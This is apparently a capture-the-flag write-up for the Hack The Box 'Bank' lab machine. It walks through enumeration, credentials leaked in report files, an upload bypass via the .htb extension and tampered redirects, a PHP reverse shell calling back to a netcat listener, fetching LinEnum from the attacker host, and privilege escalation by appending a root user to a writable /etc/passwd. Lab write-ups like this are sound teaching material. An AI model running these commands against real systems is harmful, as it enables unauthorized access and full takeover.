Bank
Contents
Port scans
root@kali:~/HTB/Machines/Bank# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.29 --rate=1000 Starting masscan 1.0.5 at 2019-11-18 04:54:03 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.29 Discovered open port 53/udp on 10.10.10.29 Discovered open port 80/tcp on 10.10.10.29 Discovered open port 53/tcp on 10.10.10.29
Nmap
root@kali:~/HTB/Machines/Bank# nmap -A -T4 -v 10.10.10.29 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-17 23:54 EST NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 23:54 Completed NSE at 23:54, 0.00s elapsed Initiating NSE at 23:54 Completed NSE at 23:54, 0.00s elapsed Initiating NSE at 23:54 Completed NSE at 23:54, 0.00s elapsed Initiating Ping Scan at 23:54 Scanning 10.10.10.29 [4 ports] Completed Ping Scan at 23:54, 0.09s elapsed (1 total hosts) Initiating SYN Stealth Scan at 23:54 Scanning bank.htb (10.10.10.29) [1000 ports] Discovered open port 53/tcp on 10.10.10.29 Discovered open port 80/tcp on 10.10.10.29 Discovered open port 22/tcp on 10.10.10.29 Completed SYN Stealth Scan at 23:54, 0.62s elapsed (1000 total ports) Initiating Service scan at 23:54 Scanning 3 services on bank.htb (10.10.10.29) Completed Service scan at 23:54, 6.09s elapsed (3 services on 1 host) Initiating OS detection (try #1) against bank.htb (10.10.10.29) adjust_timeouts2: packet supposedly had rtt of -341735 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -341735 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -341224 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -341224 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -341479 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -341479 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -341542 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -341542 microseconds. Ignoring time. Retrying OS detection (try #2) against bank.htb (10.10.10.29) adjust_timeouts2: packet supposedly had rtt of -644605 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -644605 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -743682 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -743682 microseconds. Ignoring time. Initiating Traceroute at 23:54 Completed Traceroute at 23:54, 0.05s elapsed Initiating Parallel DNS resolution of 2 hosts. at 23:54 Completed Parallel DNS resolution of 2 hosts. at 23:54, 0.19s elapsed NSE: Script scanning 10.10.10.29. Initiating NSE at 23:54 Completed NSE at 23:54, 8.24s elapsed Initiating NSE at 23:54 Completed NSE at 23:54, 0.16s elapsed Initiating NSE at 23:54 Completed NSE at 23:54, 0.00s elapsed Nmap scan report for bank.htb (10.10.10.29) Host is up (0.038s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA) | 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA) | 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA) |_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519) 53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.7 (Ubuntu) | http-title: HTB Bank - Login |_Requested resource was login.php Aggressive OS guesses: Linux 3.13 (94%), Linux 3.2 - 4.9 (94%), Linux 3.16 (93%), Linux 3.18 (93%), Linux 4.2 (93%), Linux 4.8 (93%), Linux 4.9 (93%), Crestron XPanel control system (93%), ASUS RT-N56U WAP (Linux 3.4) (92%), Linux 3.12 (92%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 199.637 days (since Thu May 2 09:36:43 2019) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=254 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp) HOP RTT ADDRESS 1 37.42 ms 10.10.14.1 2 37.55 ms bank.htb (10.10.10.29)
NSE: Script Post-scanning. Initiating NSE at 23:54 Completed NSE at 23:54, 0.00s elapsed Initiating NSE at 23:54 Completed NSE at 23:54, 0.00s elapsed Initiating NSE at 23:54 Completed NSE at 23:54, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.00 seconds Raw packets sent: 1115 (54.068KB) | Rcvd: 2543 (103.658KB)
Vulnerabilies scan
root@kali:~/HTB/Machines/Bank# nmap -p 22,53,80 --script vuln 10.10.10.29 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-17 23:56 EST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for bank.htb (10.10.10.29) Host is up (0.037s latency).
PORT STATE SERVICE 22/tcp open ssh |_clamav-exec: ERROR: Script execution failed (use -d to debug) 53/tcp open domain |_clamav-exec: ERROR: Script execution failed (use -d to debug) 80/tcp open http |_clamav-exec: ERROR: Script execution failed (use -d to debug) | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=bank.htb | Found the following possible CSRF vulnerabilities: | | Path: http://bank.htb:80/ | Form id: |_ Form action: |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /login.php: Possible admin folder |_ /inc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Nmap done: 1 IP address (1 host up) scanned in 345.44 seconds
The vulnerability seems to be a denegation of service, so not usable.
DNS enumeration
root@kali:~/HTB/Machines/Bank# dig @10.10.10.29 axfr bank.htb ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> @10.10.10.29 axfr bank.htb ; (1 server found) ;; global options: +cmd bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800 bank.htb. 604800 IN NS ns.bank.htb. bank.htb. 604800 IN A 10.10.10.29 ns.bank.htb. 604800 IN A 10.10.10.29 www.bank.htb. 604800 IN CNAME bank.htb. bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800 ;; Query time: 38 msec ;; SERVER: 10.10.10.29#53(10.10.10.29) ;; WHEN: Mon Nov 18 00:36:13 EST 2019 ;; XFR size: 6 records (messages 1, bytes 171)
The zone transfer is allowed, and the administrator email (chris@bank.htb) has been filled. It seems a good hint.And teh web page is hosted at bank.htb.
Web enumeration
The web page at http://bank.htb shows a login page.
And Wappalyzer shows PHP technology.
root@kali:~/HTB/Machines/Bank# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://bank.htb
_|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| )
Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-18_11-41-22.log
Target: http://bank.htb
[11:41:22] Starting: [11:41:24] 403 - 281B - /icons/ [11:41:25] 302 - 3KB - /support.php -> login.php [11:41:25] 403 - 283B - /uploads/ [11:41:25] 302 - 7KB - /index.php -> login.php [11:41:25] 403 - 279B - /.php [11:41:26] 200 - 2KB - /login.php [11:41:27] 200 - 2KB - /assets/ [11:41:33] 302 - 0B - /logout.php -> index.php [11:41:42] 200 - 1KB - /inc/ [11:54:25] 403 - 289B - /server-status/ [12:07:52] 200 - 248KB - /balance-transfer/
Task Completed
The enumeration gets several php pages. and an interesting folder balance-transfer. A second point is: pages index.php and support.php redirect to login.php, but the sizes are too big for a simple redirection (7kB and 3kB).
Web page analyze
index.php
root@kali:~# curl -v http://bank.htb/index.php * Trying 10.10.10.29:80... * TCP_NODELAY set * Connected to bank.htb (10.10.10.29) port 80 (#0) > GET /index.php HTTP/1.1 > Host: bank.htb > User-Agent: curl/7.66.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Date: Fri, 22 Nov 2019 01:27:50 GMT < Server: Apache/2.4.7 (Ubuntu) < X-Powered-By: PHP/5.5.9-1ubuntu4.21 * Added cookie HTBBankAuth="q4m77li6rp2gq91so2a0mhf1i2" for domain bank.htb, path /, expire 0 < Set-Cookie: HTBBankAuth=q4m77li6rp2gq91so2a0mhf1i2; path=/ < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 < Pragma: no-cache < location: login.php < Content-Length: 7322 < Content-Type: text/html < <div class="col-md-10"> <br> <div class="row"> <div class="col-lg-3 col-md-6"> <div class="panel panel-primary"> <div class="panel-heading"> <div class="row"> <div class="col-xs-3"> <i class="fa fa-usd fa-5x"></i> </div> <div class="col-xs-9 text-right"> <div style="font-size: 30px;"> $</div> <div>Balance</div> </div> </div> </div> </div> </div> <div class="col-lg-3 col-md-6"> <div class="panel panel-yellow"> <div class="panel-heading"> <div class="row"> <div class="col-xs-3"> <i class="fa fa-shopping-cart fa-5x"></i> </div> <div class="col-xs-9 text-right"> <div style="font-size: 30px;">8</div> <div>Total Transactions</div> </div> </div> </div> </div> </div> <div class="col-lg-3 col-md-6"> <div class="panel panel-green"> <div class="panel-heading"> <div class="row"> <div class="col-xs-3"> <i class="fa fa-credit-card fa-5x"></i> </div> <div class="col-xs-9 text-right"> <div style="font-size: 30px;">0</div> <div>Total CreditCards</div> </div> </div> </div> </div> </div> <div class="col-lg-3 col-md-6"> <div class="panel panel-red"> <div class="panel-heading"> <div class="row"> <div class="col-xs-3"> <i class="fa fa-support fa-5x"></i> </div> <div class="col-xs-9 text-right"> <div style="font-size: 30px;">0</div> <div>Support Tickets</div> </div> </div> </div> </div> </div> </div> <!-- /.row --> <div class=""> <div class="panel panel-default"> <div class="panel-heading"> <h3 style="font-size: 20px;"><i class="fa fa-credit-card fa-fw"></i> CreditCard Information</h3> </div> <div class="panel-body"> <div class="table-responsive"> <table class="table table-bordered table-hover table-striped"> <thead> <tr> <th>Card Type</th> <th>Card Number</th> <th>Card Exp Date</th> <th>CVV</th> <th>Balance</th> </tr> </thead> <tbody> </tbody> </table> </div> </div> </div> </div> <div class=""> <div class="panel panel-default"> <div class="panel-heading"> <h3 style="font-size: 20px;"><i class="fa fa-money fa-fw"></i> Transaction History</h3> </div> <div class="panel-body"> <div class="table-responsive"> <table class="table table-bordered table-hover table-striped"> <thead> <tr> <th>Transaction ID</th> <th>Transaction Date</th> <th>Transaction Time</th> <th>Amount (USD)</th> </tr> </thead> <tbody> <tr> <td>3326</td> <td>10/21/2016</td> <td>3:29 PM</td> <td>$321.33</td> </tr> <tr> <td>3325</td> <td>10/21/2016</td> <td>3:20 PM</td> <td>$234.34</td> </tr> <tr> <td>3324</td> <td>10/21/2016</td> <td>3:03 PM</td> <td>$724.17</td> </tr> <tr> <td>3323</td> <td>10/21/2016</td> <td>3:00 PM</td> <td>$23.71</td> </tr> <tr> <td>3322</td> <td>10/21/2016</td> <td>2:49 PM</td> <td>$8345.23</td> </tr> <tr> <td>3321</td> <td>10/21/2016</td> <td>2:23 PM</td> <td>$245.12</td> </tr> <tr> <td>3320</td> <td>10/21/2016</td> <td>2:15 PM</td> <td>$5663.54</td> </tr> <tr> <td>3319</td> <td>10/21/2016</td> <td>2:13 PM</td> <td>$943.45</td> </tr> </tbody> </table> </div> </div> </div> </div> <!-- /.row --> </div> <br> </div> <!-- /.container-fluid --> </div> <!-- /#page-wrapper --> <br> </div> <!-- /#wrapper --> <br> <!-- jQuery --> <script src="./assets/js/jquery.js"></script> <br> <!-- Bootstrap Core JavaScript --> <script src="./assets/js/bootstrap.min.js"></script> <br> <!-- Morris Charts JavaScript --> <script src="./assets/js/plugins/morris/raphael.min.js"></script> <script src="./assets/js/plugins/morris/morris.min.js"></script> <script src="./assets/js/plugins/morris/morris-data.js"></script> <br> <!-- SweetAlert --> <script src="./assets/js/sweetalert.min.js"></script> <br> </body> <br> </html> * Connection #0 to host bank.htb left intact
The header 302 redirect to login.php, but index.php deliver content before the redirect. This is a vulnerability, because we can see information from the application.
support.php
root@kali:~# curl -v http://bank.htb/support.php * Trying 10.10.10.29:80... * TCP_NODELAY set * Connected to bank.htb (10.10.10.29) port 80 (#0) > GET /support.php HTTP/1.1 > Host: bank.htb > User-Agent: curl/7.66.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Date: Fri, 22 Nov 2019 01:31:04 GMT < Server: Apache/2.4.7 (Ubuntu) < X-Powered-By: PHP/5.5.9-1ubuntu4.21 * Added cookie HTBBankAuth="afsdndhrkur5j9mpginc2se6t1" for domain bank.htb, path /, expire 0 < Set-Cookie: HTBBankAuth=afsdndhrkur5j9mpginc2se6t1; path=/ < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 < Pragma: no-cache < location: login.php < Content-Length: 3291 < Content-Type: text/html < <br> <div class="col-sm-5"> <div class="panel panel-primary"> <div class="panel-heading"> <h3 style="font-size: 20px;">My Tickets</h3> </div> <div class="panel-body"> <div class="content-box-large"> <div class="panel-body"> <table class="table table-bordered"> <thead> <tr> <th>#</th> <th>Title</th> <th>Message</th> <th>Attachment</th> <th>Actions</th> </tr> </thead> <tbody> </tbody> </table> </div> </div> </div> </div> </div> <!-- New Ticket --> <div class="col-sm-5"> <section class="panel"> <br> <div class="panel-body"> <form class="new_ticket" id="new_ticket" accept-charset="UTF-8" method="post" enctype="multipart/form-data"> <br> <label>Title</label> <input required placeholder="Title" class="form-control" type="text" name="title" id="ticket_title" style="background-repeat: repeat; background-image: none; background-position: 0% 0%;"> <br> <br> <label>Message</label> <textarea required placeholder="Tell us your problem" class="form-control" style="height: 170px; background-repeat: repeat; background-image: none; background-position: 0% 0%;" name="message" id="ticket_message"></textarea> <br> <div style="position:relative;"> <!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] --> <a class='btn btn-primary' href='javascript:;'> Choose File... <input type="file" required style='position:absolute;z-index:2;top:0;left:0;filter: alpha(opacity=0);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";opacity:0;background-color:transparent;color:transparent;' name="fileToUpload" size="40" onchange='$("#upload-file-info").html($(this).val().replace("C:\\fakepath\\", ""));'> </a> <span class='label label-info' id="upload-file-info"></span> </div> <br> <button name="submitadd" type="submit" class="btn btn-primary mt20" data-disable-with="<div class="loading-o" style="padding: 7px 21px;"></div>">Submit</button> </form> <br> </div> <br> </section> <br> </div> <br> </div> <!-- /#page-wrapper --> <br> </div> <!-- /#wrapper --> <br> <!-- jQuery --> <script src="./assets/js/jquery.js"></script> <br> <!-- Bootstrap Core JavaScript --> <script src="./assets/js/bootstrap.min.js"></script> <br> <!-- Morris Charts JavaScript --> <script src="./assets/js/plugins/morris/raphael.min.js"></script> <script src="./assets/js/plugins/morris/morris.min.js"></script> <script src="./assets/js/plugins/morris/morris-data.js"></script> <br> <!-- SweetAlert --> <script src="./assets/js/sweetalert.min.js"></script> <br> </body> <br> </html> * Connection #0 to host bank.htb left intact
Again, the content is sent with the redirect. In this case there is a form that allows to upload files. And more important, the comment indicates that files with extension htb are executed.
Folder balance-transfer
There are a bunch of files, but the content is encrypted.
Download of files from balance-transfer
root@kali:~/HTB/Machines/Bank/balance-transfer# wget -r http://bank.htb/balance-transfer/ root@kali:~/HTB/Machines/Bank/balance-transfer# cd bank.htb/balance-transfer/ root@kali:~/HTB/Machines/Bank/balance-transfer/bank.htb/balance-transfer# ls -l *.acc | wc -l 999
There is a thousand files. Find something uninteresting is like to search a needle in an haystack. But I remembered the email from the DNS enumeration, adn bingo
root@kali:~/HTB/Machines/Bank/balance-transfer/bank.htb/balance-transfer# grep chris@bank.htb *.acc 68576f20e9732f1b2edc4df5b8533230.acc:Email: chris@bank.htb root@kali:~/HTB/Machines/Bank/balance-transfer/bank.htb/balance-transfer# cat 68576f20e9732f1b2edc4df5b8533230.acc --ERR ENCRYPT FAILED +=================+ | HTB Bank Report | +=================+
===UserAccount=== Full Name: Christos Christopoulos Email: chris@bank.htb Password: !##HTBB4nkP4ssw0rd!## CreditCards: 5 Transactions: 39 Balance: 8842803 .
Access to the application
With the user and password, we can login into the application.
The support page allows file upload.
Creation of php reverse shell
root@kali:~/HTB/Machines/Bank# cp /usr/share/webshells/php/php-reverse-shell.php ./ Update the parameters of the reverse shell root@kali:~/HTB/Machines/Bank# grep CHANGE php-reverse-shell.php $ip = '10.10.14.34'; // CHANGE THIS $port = 4444; // CHANGE THIS
Run listener
root@kali:~/HTB/Machines/Bank# rlwrap nc -nvlp 4444
Upload file to support page
But the upload fails.
Rename of rs with htb extension
Because of the comment on the support page, I renamed the file with htb extension.
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
And this time it works, the file is uploaded.
Open the reverse shell
root@kali:~/HTB/Machines/Bank# curl http://bank.htb/uploads/php-reverse-shell.htb
And on the listener
root@kali:~/HTB/Machines/Bank# rlwrap nc -nvlp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.29. Ncat: Connection from 10.10.10.29:34304. Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux 04:52:21 up 2:12, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@bank:/$ <CTRL Z> [1]+ Stopped rlwrap nc -nvlp 4444 root@kali:~/HTB/Machines/Bank# stty rows 24 columns 134 root@kali:~/HTB/Machines/Bank# stty raw -echo root@kali:~/HTB/Machines/Bank# fg rlwrap nc -nvlp 4444 www-data@bank:/$ export TERM=screen export TERM=screen
Alternative way to gain the reverse shell without the user and password
As told before, the web application send the html code and the redirect. We can use this coding mistake to upload a file with the page support without authentication.
Setup Burp suite
We want to filter the interceptions from and for the machine bank.htb, and we want to intercept responses too.
Access the form
Send the request for the page support.php
When the response come back, we see that the server responds 302 (redirect) and the header location redirects to the page login.php
The response is modified to send to the browser a response 200 OK and removing the location header.
The form appears on the browser.
Upload the file
Fill the form with rs file and submit it.
Forward the request.
Modify the response as 200 OK, and without location header.
The file is uploaded to the server.
Start the listener
root@kali:~/HTB/Machines/Bank# rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Open the reverse shell
And the reverse shell is opened.
root@kali:~/HTB/Machines/Bank# rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.29. Ncat: Connection from 10.10.10.29:34114. Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux 06:13:32 up 22 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@bank:/$ <CTRL Z> [1]+ Stopped rlwrap nc -nvlp 4444 root@kali:~/HTB/Machines/Bank# stty rows 24 columns 134 root@kali:~/HTB/Machines/Bank# stty raw -echo root@kali:~/HTB/Machines/Bank# fg rlwrap nc -nvlp 4444 www-data@bank:/$ export TERM=screen export TERM=screen
User flag
www-data@bank:/$ cat /home/chris/user.txt cat /home/chris/user.txt <USER_FLAG>
User escalation
Download the script LinEnum.sh
root@kali:~/HTB/Machines/Bank# wget -q https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
To upload the file to the server, I start a local web server.
root@kali:~/HTB/Machines/Bank# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
And the script is downloaded to the victim.
www-data@bank:/$ cd /tmp cd /tmp www-data@bank:/tmp$ wget http://10.10.14.34/LinEnum.sh wget http://10.10.14.34/LinEnum.sh --2019-11-18 17:35:36-- http://10.10.14.34/LinEnum.sh Connecting to 10.10.14.34:80... connected. HTTP request sent, awaiting response... 200 OK Length: 46108 (45K) [text/x-sh] Saving to: 'LinEnum.sh'
100%[======================================>] 46,108 --.-K/s in 0.09
2019-11-18 17:35:36 (494 KB/s) - 'LinEnum.sh' saved [46108/46108] www-data@bank:/tmp$ chmod +x LinEnum.sh chmod +x LinEnum.sh
Run enumeration script
www-data@bank:/tmp$ ./LinEnum.sh -r linenum -e /tmp/ -t
I upload the report to my machine to read it easily.
www-data@bank:/tmp$ scp -r linenum-18-11-19 LinEnum-export-18-11-19/ root@10.10.14.34:/root/HTB/Machines/Bank/linenum/
Useful information from the linux enumeration
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
uid=1000(chris) gid=1000(chris) groups=1000(chris),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
The file /var/www/bank/bankreports.txt
[-] Are permissions on /home directories lax: total 12K drwxr-xr-x 3 root root 4.0K May 28 2017 . drwxr-xr-x 22 root root 4.0K Dec 24 2017 .. drwxr-xr-x 3 chris chris 4.0K Jun 14 2017 chris
[-] Files not owned by user but writable by group: -rw-rw-rw- 1 root root 1252 May 28 2017 /etc/passwd
[-] Root is allowed to login via SSH: PermitRootLogin yes
[-] MYSQL version: mysql Ver 14.14 Distrib 5.5.55, for debian-linux-gnu (i686) using readline 6.3
[-] Apache version: Server version: Apache/2.4.7 (Ubuntu) Server built: May 9 2017 16:13:38
[-] Can we read/write sensitive files: -rw-rw-rw- 1 root root 1252 May 28 2017 /etc/passwd -rw-r--r-- 1 root root 707 May 28 2017 /etc/group -rw-r--r-- 1 root root 665 Feb 20 2014 /etc/profile -rw-r----- 1 root shadow 895 Jun 14 2017 /etc/shadow
[-] SUID files: -rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency
File /var/www/bank/bankreports.txt
I missed it, because I didn't add the extension txt to my web enumation :(, in this file, the user and password were in clear too.
root@kali:~/HTB/Machines/Bank# curl bank.htb/bankreports.txt +=================+ | HTB Bank Report | +=================+
===Users=== Full Name: Christos Christopoulos Email: chris@bank.htb Password: !##HTBB4nkP4ssw0rd!## CreditCards: 2 Transactions: 8 Balance: 1.337$
Permissions on /home directories are lax
As we already have seen, we do not need to escalate the user to capture the user flag.
/etc/passwd is writable
We can escalate privilege easily with this way.
/var/htb/bin/emergency
This file can be executed with root, and seems interesting.
www-data@bank:/tmp$ file /var/htb/bin/emergency file /var/htb/bin/emergency /var/htb/bin/emergency: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped
This file could search suid files manually.
www-data@bank:/tmp$ find / -perm -4000 -exec ls -l {} \; 2>/dev/null
find / -perm -4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency
-rwsr-xr-x 1 root root 5480 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 492972 Aug 11 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9808 Nov 24 2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
-rwsr-xr-x 1 root root 35916 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45420 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 44620 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 18168 Nov 24 2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 30984 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 18136 May 8 2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 66284 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 156708 May 29 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
-rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
-rwsr-xr-x 1 root root 35300 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
-rwsr-xr-x 1 root root 88752 Nov 24 2016 /bin/mount
-rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount
Root Flag
/etc/passwd
www-data@bank:/tmp$ echo "root2:`openssl passwd hello`:0:0:root:/root:/bin/bash" >> /etc/passwd >> /etc/passwdenssl passwd hello`:0:0:root:/root:/bin/bash"
A new line for user root2 is created with password hello.
root@kali:~/HTB/Machines/Bank# ssh root2@bank.htb The authenticity of host 'bank.htb (10.10.10.29)' can't be established. ECDSA key fingerprint is SHA256:FzRjUWEJH7r9hunMHbWe5kA2nfM0lnrdGyDQQ9uXg68. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'bank.htb' (ECDSA) to the list of known hosts. root2@bank.htb's password: Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-79-generic i686)
System information as of Fri Nov 22 02:39:54 EET 2019
System load: 0.16 Memory usage: 4% Processes: 84 Usage of /: 7.4% of 28.42GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at: https://landscape.canonical.com/ Your Hardware Enablement Stack (HWE) is supported until April 2019. Last login: Fri Jun 16 07:44:56 2017 root@bank:~# whoami root root@bank:~# cat /root/root.txt <ROOT FLAG>
/var/htb/bin/emergency
This alternative way is to use the emergency program found before.
www-data@bank:/tmp$ whoami whoami www-data www-data@bank:/tmp$ /var/htb/bin/emergency /var/htb/bin/emergency # whoami whoami root # cat /root/root.txt cat /root/root.txt <ROOT FLAG>
References
Daniel Simao 18:03, 21 November 2019 (EST)
